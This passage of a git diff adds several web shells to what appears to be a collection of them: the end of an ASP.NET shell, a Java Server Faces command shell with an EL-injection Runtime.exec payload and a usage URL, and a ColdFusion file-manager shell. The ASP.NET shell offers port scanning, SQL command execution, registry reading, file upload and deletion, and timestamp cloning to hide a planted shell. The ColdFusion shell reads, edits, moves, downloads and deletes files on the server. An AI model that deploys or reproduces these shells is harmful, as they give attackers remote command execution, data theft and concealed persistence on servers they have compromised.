+	<p align=center>[ List System Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+	<table align=center>
+		<tr>
+			<td>
+			<% 
+				dim WMI_function = "Win32_NTLogEvent where Logfile='System'"		
+				dim Fields_to_load = "Logfile,Message,type"
+				dim fail_description = " Access to " + WMI_function + " is protected"
+				
+				Try
+				output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
+				Catch
+				rw("This function is disabled by server")
+				End Try
+			%>
+			</td>
+		</tr>
+	</table>
+</form>
+<%
+	case "auser"
+%>
+<form runat="server">
+	<p align=center>[ IIS List Anonymous' User details ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+	<table align=center>
+		<tr>
+			<td>
+			<% 
+				Try
+				IIS_list_Anon_Name_Pass
+				Catch
+				rw("This function is disabled by server")
+				End Try
+			%>
+			</td>
+		</tr>
+	</table>
+</form>
+<%
+	case "scan"
+%>
+	<form runat="server">
+    <p>[ ASP.NET Port Scanner ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+    <div>
+    	C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)<br /><br />
+        Start IP :&nbsp;&nbsp;<asp:TextBox ID="txtStartIP" runat="server" Width="177px">127.0.0.1</asp:TextBox>
+        &nbsp;&nbsp; &nbsp; --- &nbsp;End Ip : &nbsp;<asp:TextBox ID="txtEndIP" runat="server" Width="185px">127.0.0.1</asp:TextBox>&nbsp;
+        <br />
+        Ports &nbsp;&nbsp;&nbsp;:&nbsp;&nbsp;<asp:TextBox ID="txtPorts" runat="server" Width="473px">21,25,80,1433,3306,3389</asp:TextBox><br />
+        <br />
+        <asp:Button ID="btnScan" runat="server" Text="Scan" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnScan_Click" />
+        &nbsp;&nbsp;
+        <asp:Button ID="btnReset" runat="server" Text="Reset" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnReset_Click" /><br />
+        <br />
+        <asp:Label ID="Label1" runat="server" Text="Result:" Visible="False" Width="70px"></asp:Label><br />
+        <asp:ListBox ID="lstRet" runat="server" BackColor="Black" ForeColor="#00C000" Height="251px"
+            Width="527px" Visible="False"></asp:ListBox>
+        <hr align=left style="width: 526px" />
+        <br />
+       </div>
+    </form>
+<%
+case "iisspy"
+%>
+	<p align=center>[ IIS Spy ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+	<% 
+				Try
+				Response.write(IISSpy())
+				Catch
+				rw("This function is disabled by server")
+				End Try
+	%>
+<%
+case "sqltool"
+%>
+	<p align=center>[ SQL Tool ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+	<% 
+				Try
+				
+				Catch
+				rw("This function is disabled by server")
+				End Try
+	%>
+<%
+case "regshell"
+%>
+	<form runat="server">
+	<p align=center >[ Registry Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+  	Key:&nbsp;&nbsp;
+	<asp:TextBox ID="txtRegKey" runat="server" style="width: 595px; border: 1px solid #084B8E">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br><br>
+	Value:
+	<asp:TextBox ID="txtRegValue" runat="server" style="border: 1px solid #084B8E">ComputerName</asp:TextBox>&nbsp;&nbsp;
+  	<asp:Button ID="btnReadReg" runat="server" Text="Run" OnClick="RegistryRead" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
+  	<p>
+    <asp:Label ID="lblresultReg" runat="server" style="color: red"/>      
+    </p>
+	</form>
+<%
+	case "sqlman"
+%>
+<form runat="server">
+  <p>[ MSSQL Query ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+  <p> Execute query with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
+  <p>Host:
+    <asp:TextBox ID="txtHost" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
+  <p>
+  SQL Name:
+    <asp:TextBox ID="txtSqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
+  SQL Password:
+  <asp:TextBox ID="txtSqlPass" runat="server" Width="80" class="TextBox"/>
+  </p>
+  Command:
+  <asp:TextBox ID="txtSqlcmd" runat="server" Width="500" class="TextBox" TextMode="MultiLine" Rows="6"/></br>
+  <asp:Button ID="btnButtonSQL" runat="server" Text="Run" OnClick="RunSQLQUERY" class="buttom" Width="100"/>  
+  <p>
+   <asp:Label ID="lblresultSQL" runat="server" style="style2"/>      </p>
+</form>
+<%
+	case "sqlrootkit"
+%>
+<form runat="server">
+  <p>[ SqlRootKit.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
+  <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
+  <p>Host:
+    <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
+  <p>
+  SQL Name:
+    <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
+  SQL Password:
+  <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/>
+  </p>
+  Command:
+  <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
+  <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/>  
+  <p>
+   <asp:Label ID="resultSQL" runat="server" style="style2"/>      </p>
+</form>
+<%
+	case "del"
+		dim a as string
+		a=request.QueryString("src")
+		call existdir(a)
+		call del(a)  
+		response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
+	case "copy"
+		call existdir(request.QueryString("src"))
+		session("cutboard")="" & request.QueryString("src")
+		response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
+	case "cut"
+		call existdir(request.QueryString("src"))
+		session("cutboard")="
" & request.QueryString("src")
+		response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
+	case "paste"
+		dim ow as integer
+		if request.Form("OverWrite")<>"" then ow=1
+		if request.Form("Cancel")<>"" then ow=2
+		url=request.QueryString("src")
+		call existdir(url)
+		dim d as string
+		d=session("cutboard")
+		if left(d,1)="
" then
+			TEMP1=url & path.getfilename(mid(replace(d,"
",""),1,len(replace(d,"
",""))-1))
+			TEMP2=url & replace(path.getfilename(d),"
","")
+			if right(d,1)="\" then   
+				call xexistdir(TEMP1,ow)
+				directory.move(replace(d,"
",""),TEMP1 & "\")  
+				response.Write("<script>alert('Cut  " & replace(replace(d,"
",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
+			else
+				call xexistdir(TEMP2,ow)
+				file.move(replace(d,"
",""),TEMP2)
+				response.Write("<script>alert('Cut  " & replace(replace(d,"
",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
+			end if
+		else
+			TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
+			TEMP2=url & path.getfilename(replace(d,"",""))
+			if right(d,1)="\" then 
+				call xexistdir(TEMP1,ow)
+				directory.createdirectory(TEMP1)
+				call copydir(replace(d,"",""),TEMP1 & "\")
+				response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
+			else
+				call xexistdir(TEMP2,ow)
+				file.copy(replace(d,"",""),TEMP2)
+				response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
+			end if
+		end if
+	case "upfile"
+		url=request.QueryString("src")
+%>
+<form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server"  onSubmit="return checkname();">
+ You will upload file to this directory : <span class="style3"><%=url%></span><br>
+ Please choose file from your computer :
+ <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server">
+    <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom">
+</form>
+<a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a>
+<%
+	case "new"
+		url=request.QueryString("src")
+%>
+<form runat="server">
+  <%=url%><br>
+  Name:
+  <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
+  <br>
+  <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
+  <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server"  GroupName="New"/> 
+  <br>
+  <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom"  OnClick="NewFD"/>  
+  <input name="Src" type="hidden" value="<%=url%>">
+</form>
+<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
+<%
+	case "edit"
+		dim b as string
+		b=request.QueryString("src")
+		call existdir(b)
+		dim myread as new streamreader(b,encoding.default)
+		filepath.text=b
+		content.text=myread.readtoend
+%>
+<form runat="server">
+  <table width="100%"  border="1" align="center">
+    <tr>      <td width="11%">Path</td>
+      <td width="89%">
+      <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
+      *</td>
+    </tr>
+    <tr>
+      <td>Content</td> 
+      <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
+    </tr>
+    <tr>
+      <td></td>
+      <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/>         
+      </td>
+    </tr>
+  </table>
+</form>
+<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
+<%
+  		myread.close
+	case "rename"
+		url=request.QueryString("src")
+		if request.Form("name")="" then
+	%>
+<form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
+  <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%>
+    <input type="text" name="name" class="TextBox">
+    <input type="submit" name="Submit3" value="Submit" class="buttom">
+</p>
+</form>
+<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
+<script language="javascript">
+function checkname()
+{
+if(formRn.name.value==""){alert("You shall input filename :(");return false}
+}
+</script>
+  <%
+		else
+			if Rename() then
+				response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
+			else
+				response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
+			end if
+		end if
+	case "samename"
+		url=request.QueryString("src")
+%>
+<form name="form1" method="post" action="?action=paste&src=<%=server.UrlEncode(url)%>">
+<p class="style3">Exist the same name file , can you overwrite ?(If you click &quot; no&quot; , it will auto add a number as prefix)</p>
+  <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom">
+<input name="Cancel" type="submit" id="Cancel" value="No" class="buttom">
+</form>
+<a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
+   <%
+    case "clonetime"
+		time1.Text=request.QueryString("src")&"kshell.aspx"
+		time2.Text=request.QueryString("src")
+	%>
+<form runat="server">
+  <p>[CloneTime for WebAdmin]<i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:history.back(1);">Back</a></i> </p>
+  <p>A tool that it copy the file or directory's time to another file or directory </p>
+  <p>Rework File or Dir:
+    <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p>
+  <p>Copied File or Dir:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+    <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p>
+<asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/>
+</form>
+<p>
+  <%
+	case "logout"
+   		session.Abandon()
+		response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>")
+	end select
+end if
+Catch error_x
+	response.Write("<font color=""red""><br>Wrong: </font>"&error_x.Message)
+End Try
+%>
+</p>
+</p>
+<hr>
+<script language="javascript">
+function closewindow()
+{self.close();}
+</script>
+</body>
+</html>
diff --git a/jsp/java/java_faces_shell.xhtml b/jsp/java/java_faces_shell.xhtml
new file mode 100644
index 00000000..973b2383
--- /dev/null
+++ b/jsp/java/java_faces_shell.xhtml
@@ -0,0 +1,103 @@
+<?xml version='1.0' encoding='UTF-8' ?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml"
+	  xmlns:ui="http://java.sun.com/jsf/facelets"
+	  xmlns:h="http://java.sun.com/jsf/html"
+	  xmlns:c="http://xmlns.jcp.org/jsp/jstl/core">
+	<style type="text/css">
+	.wrapper{
+		border: 2px solid black;
+		background-color: #C0C0C0 ; 
+		overflow:hidden;
+		margin: auto;
+		width: 50%;
+				word-wrap: break-word;
+	}
+	.field{
+		margin: 20px;
+	}
+
+	.output{
+	
+	}
+	body{
+		background-color: #383838;
+	}
+</style>
+	<body>
+		
+		<c:choose>
+			<c:when test="${request.getParameter('do') != null}">
+			#{view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1,2".split(",").getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),("/bin/bash,-c,".concat(request.getParameter("do")).concat(">/tmp/shell")).split(","))}
+			</c:when>
+	
+			<c:when test="${request.getParameter('cmd') !=null}">
+								<code>
+					<i>${request.getParameter("cmd")}</i>:
+					<pre>#{ view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("next").invoke(
+								view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("useDelimiter", "a".getClass()).invoke(
+									 view.getClass().getClassLoader().loadClass("java.util.Scanner").getConstructor(view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell").getClass()).newInstance(
+											view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell")
+									 ),"\\Z"
+								)
+							)}</pre>
+				</code>
+			</c:when>
+
+			<c:when test="${request.getParameter('clear')!= null}">
+			   ${view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1".getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"rm /tmp/shell")}
+			</c:when>
+		</c:choose>
+		
+
+
+
+	<div class="wrapper">
+		<div class="field">
+			<center>----------------------------------------------------------</center>
+			<div class="output" id="output">
+			
+			</div>
+			<center>----------------------------------------------------------</center>
+			<center>
+				<form onsubmit="return startMagic()">
+					<input autocomplete="off" id='cmd' name='cmd' size='100' placeholder='command' style="text-align:center; "/>
+				</form>
+			</center>
+			<center><font size="1"><i>Java Server Faces MiniWebCmdShell 0.2 by HeartLESS.</i></font></center>
+		</div>
+	</div>
+	</body>
+<script type="text/javascript">
+	var xmlhttp;
+		if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
+			xmlhttp=new XMLHttpRequest();
+		} else {// code for IE6, IE5
+			xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
+		}
+
+	 function startMagic(){
+			try{
+						//execution
+							xmlhttp.open("GET",location.pathname+"?do=" + encodeURI(document.getElementById("cmd").value),false);
+							xmlhttp.send();
+							console.log(xmlhttp.responseText);
+						//reading
+							xmlhttp.open("GET",location.pathname+"?cmd=" + encodeURI(document.getElementById("cmd").value),false);
+							xmlhttp.send();
+							a = xmlhttp.responseText.indexOf('<code>');
+							b = xmlhttp.responseText.indexOf('</code>');
+							document.getElementById('output').innerHTML = xmlhttp.responseText.substr(a+6,b-a -6);
+						//cleaning
+							xmlhttp.open("GET",location.pathname+"?clear",true);
+							xmlhttp.send();
+						}catch(e){
+							console.log(e);
+						}
+			return false;
+		}
+
+
+</script>
+	
+</html>
\ No newline at end of file
diff --git a/jsp/java/readme.md b/jsp/java/readme.md
new file mode 100644
index 00000000..ad9db976
--- /dev/null
+++ b/jsp/java/readme.md
@@ -0,0 +1,2 @@
+like: 
+http://site/?do=cmd,/C,payload
\ No newline at end of file
diff --git a/other/ololo.cfm b/other/ololo.cfm
new file mode 100644
index 00000000..2d9b057e
--- /dev/null
+++ b/other/ololo.cfm
@@ -0,0 +1,688 @@
+<html>
+<style type="text/css">
+body{background-color:#444;color:#e1e1e1;}
+body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
+table.info{ color:#fff;background-color:#222; }
+span,h1,a{ color: #df5 !important; }
+span{ font-weight: bolder; }
+h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
+div.content{ padding: 5px;margin-left:5px;background-color:#333; }
+a{text-decoration: none;}
+a:hover{ text-decoration:underline; }
+.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
+.bigarea{ width:100%;height:300px; }
+input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
+form{ margin:0px; }
+.toolsInp{ width: 300px }
+.main th{text-align:left;background-color:#5e5e5e;}
+.main tr:hover{background-color:#5e5e5e}
+.l1{background-color:#444}
+.l2{background-color:#333}
+pre{font-family:Courier,Monospace;}
+</style>
+<head>
+<TITLE>CFM SHELL V3.0 edition</TITLE>
+<meta http-equiv="Content-Type" content="text/html">
+</head>
+<body>
+<center>
+	Cfm Shell v3.0 edition
+</center>
+<hr>
+<script langauge="JavaScript" type="text/javascript">
+function doMenu(item)
+{
+	obj=document.getElementById(item);
+	col=document.getElementById("x" + item);
+	if (obj.style.display=="none")
+	{
+		obj.style.display="block"; col.innerHTML="[-]";
+	}
+	else
+	{
+		obj.style.display="none"; col.innerHTML="[+]";
+	}
+}
+</script>
+<!--- Login --->
+
+<cfif IsDefined("logout")>
+	<cfset structclear(cookie)>
+	<cflocation url="?" addtoken="No">
+</cfif>
+<cfif IsDefined("cookie.username")>
+<!--- Main --->
+<center>Username:<font color="#FFFF33"><b><cfoutput>#username#</cfoutput></b></font> !</center>
+<center><b><a href="?logout">Logout</a></b></center>
+<hr>
+<cfoutput>
+<cfset dir = #GetDirectoryFromPath(GetTemplatePath())#>
+<cfif Right(dir, 1) neq "\" >
+	<cfset dir = "#dir#\">
+</cfif>
+<!--- Ham get Datasource Infor 
+<cfscript>
+factory = CreateObject("java", "coldfusion.server.ServiceFactory");
+DataSoureceInfo = factory.DataSourceService.getDatasources();
+</cfscript> --->
+
+<!--- Ham doc tep --->
+<cffunction name="ReadFile" access="remote" output="true" returntype="any">  
+	<cfargument name="fileread" type="string" required="true"/>  
+		<cffile action="read" file="#arguments.fileread#" variable="line">
+		<cfoutput>#line#</cfoutput>
+</cffunction>
+<!--- ham xoa thu muc --->
+<cffunction name="dirDelete" access="public" output="false" returntype="any">
+<cfargument name="dir" required="no" default="#expandPath('/pocket_cache/')#">
+<cfdirectory action="list" name="delfile" directory="#arguments.dir#">
+<cfif delfile.RecordCount EQ 0>
+<cfif directoryExists(arguments.dir)>
+<cfdirectory action="delete" directory="#arguments.dir#">
+</cfif>
+<cfelse>
+<cfloop query="delfile">
+<cfif type EQ "file">
+<cffile action="delete" file="#arguments.dir#\#name#">
+<cfelse>
+<cfset temp = dirDelete(arguments.dir & '\' & #delfile.name#)>
+</cfif>
+</cfloop>
+<cfif directoryExists(arguments.dir)>
+<cfdirectory action="delete" directory="#arguments.dir#">
+</cfif>
+</cfif>
+</cffunction>
+<!--- ham doi ten thu muc --->
+<cffunction name="renameDirectory" access="remote" output="false" returntype="void">  
+	<cfargument name="oldDir" type="string" required="true"/>  
+	<cfargument name="newDir" type="string" required="true"/>  
+	<cfdirectory action="rename" directory="#arguments.oldDir#" newdirectory="#arguments.newDir#"/>  
+</cffunction>
+</cfoutput>
+<!--- bat dau nhan lenh --->
+<cfif isDefined("action")>
+	<cfif action is "goto">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfset dir = #scr#>
+			<cfif Right(dir, 1) neq "\" >
+				<cfset dir = "#dir#\">
+			</cfif>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "edit">
+	<cfoutput>
+	<cfif isDefined("scr")>
+		<cfif FileExists("#scr#")>
+			<cfset file_name=#Replace(#scr#,'#GetDirectoryFromPath(scr)#','','ALL')#>
+			<title>&##272;ang s&##7917;a t&##7879;p #scr#</title>
+			<script language="JavaScript" type="text/javascript">
+				function sTrim(sVariable)
+				{
+					return sVariable.replace(/^\s+|\s+$/g,"");
+				}
+				function validateFields(form)
+				{
+					return true;
+				}
+			</script>
+			<cffile action="read" file="#scr#" variable="thisFile">
+                        <h1>Edit file:</h1>
+                        <div class=content>	
+          		<form action="?action=save&scr=#GetDirectoryFromPath(scr)#" method="post" onsubmit="return validateFields(this);">
+				<input type="hidden" name="fileName" value="#file_name#" />
+				<input type="hidden" name="action_type" value="edit" />
+					<tr>
+						<td style="font-weight:bold;" nowrap="nowrap">
+							File path: 
+						</td>
+						<td>
+							#scr#
+						</td>
+					</tr>
+					<tr>
+						<td>
+						<cfset thisFile=#Replace(#thisFile#,'<','<','ALL')#>
+						<cfset thisFile=#Replace(#thisFile#,'>','>','ALL')#>
+							<textarea class="bigarea" name="fileContent">#thisFile#</textarea>
+						</td>
+					</tr>
+					<tr>
+						<td>
+							<input type="submit" value="Save" style="font-family:verdana; font-size:11px;" />
+						</td>
+					</tr>
+			</form></div>
+		<cfelse>
+			<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
+		</cfif>
+		<a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+	<cfelse>
+		<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+	</cfif>
+	</cfoutput>
+	<cfelseif action is "cut">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfset cutdir = #scr#>
+			<cfif FileExists("#scr#")>
+				<cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#>
+				<cfloop condition = "Right(cutdir, 1) neq '\'">
+					<cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#>
+				</cfloop>
+				<cfform name="articles" ENCTYPE="multipart/form-data">
+					B&##7841;n s&##7869; di chuy&##7875;n t&##7879;p <font color="red">#scr#</font> t&##7899;i <cfinput type="text" name="thumucsechuyen" size="50" value="#cutdir#"> <input type="submit" value="Th&##7921;c hi&##7879;n" />
+				</cfform>
+				<cfif isDefined("thumucsechuyen")>
+					<cffile action="move" source="#scr#" destination="#thumucsechuyen#">
+					<cflocation url="?action=goto&scr=#cutdir#" addtoken="No">
+				</cfif>
+			<cfelse>
+				<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
+			</cfif>
+			<a href="?action=goto&scr=#cutdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "copy">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfset copydir = #scr#>
+			<cfif FileExists("#scr#")>
+				<cfset copydir = #RemoveChars(copydir, len(copydir), 1)#>
+				<cfloop condition = "Right(copydir, 1) neq '\'">
+					<cfset copydir = #RemoveChars(copydir, len(copydir), 1)#>
+				</cfloop>
+				<cfform name="articles" ENCTYPE="multipart/form-data">
+					B&##7841;n s&##7869; sao ch&##233;p t&##7879;p <font color="red">#scr#</font> t&##7899;i <cfinput type="text" name="thumucsechuyen" size="50" value="#copydir#"> <input type="submit" value="Th&##7921;c hi&##7879;n" />
+				</cfform>
+				<cfif isDefined("thumucsechuyen")>
+					<cffile action="copy" source="#scr#" destination="#thumucsechuyen#">
+					<cflocation url="?action=goto&scr=#copydir#" addtoken="No">
+				</cfif>
+			<cfelse>
+				<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
+			</cfif>
+			<a href="?action=goto&scr=#copydir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "rename">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfset renamedir = #scr#>
+			<cfif FileExists("#scr#")>
+				<cfloop condition = "Right(renamedir, 1) neq '\'">
+					<cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
+				</cfloop>
+				<cfform name="articles" ENCTYPE="multipart/form-data">
+					Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" />
+				</cfform>
+				<cfif isDefined("namechange")>
+					<cffile action="rename" source="#scr#" destination="#renamedir##namechange#">
+					<cflocation url="?action=goto&scr=#renamedir#" addtoken="No">
+				</cfif>
+			<cfelse>
+				<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
+			</cfif>
+			<a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "renamed">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfset renamedir = #scr#>
+			<cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
+			<cfif DirectoryExists("#scr#")>
+				<cfloop condition = "Right(renamedir, 1) neq '\'">
+					<cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
+				</cfloop>
+				<cfform name="articles" ENCTYPE="multipart/form-data">
+					Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" />
+				</cfform>
+				<cfif isDefined("namechange")>
+					#renameDirectory('#scr#','#renamedir##namechange#')#
+					<cflocation url="?action=goto&scr=#renamedir#" addtoken="No">
+				</cfif>
+			<cfelse>
+				<p>Th&##432; m&##7909;c #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
+			</cfif>
+			<a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- ..</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- ..</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "down">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfset downdir = #scr#>
+			<cfif FileExists("#scr#")>
+				<cfloop condition = "Right(downdir, 1) neq '\'">
+					<cfset downdir = #RemoveChars(downdir, len(downdir), 1)#>
+				</cfloop>
+				<cfheader name="Content-Disposition" value="attachment; filename=#getFileFromPath (scr)#"> 
+				<cfcontent file="#scr#" type="application/octet-stream">
+			<cfelse>
+				<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
+			</cfif>
+			<a href="?action=goto&scr=#downdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "del">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfset deletedir = #scr#>
+			<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
+			<cfif FileExists("#scr#")>
+				<cfloop condition = "Right(deletedir, 1) neq '\'">
+					<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
+				</cfloop>
+				<cffile action="delete" file="#scr#">
+				<cflocation url="?action=goto&scr=#deletedir#" addtoken="No">
+			<cfelse>
+				<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
+			</cfif>
+			<a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "deld">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfset deletedir = #scr#>
+			<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
+			<cfif DirectoryExists("#scr#")>
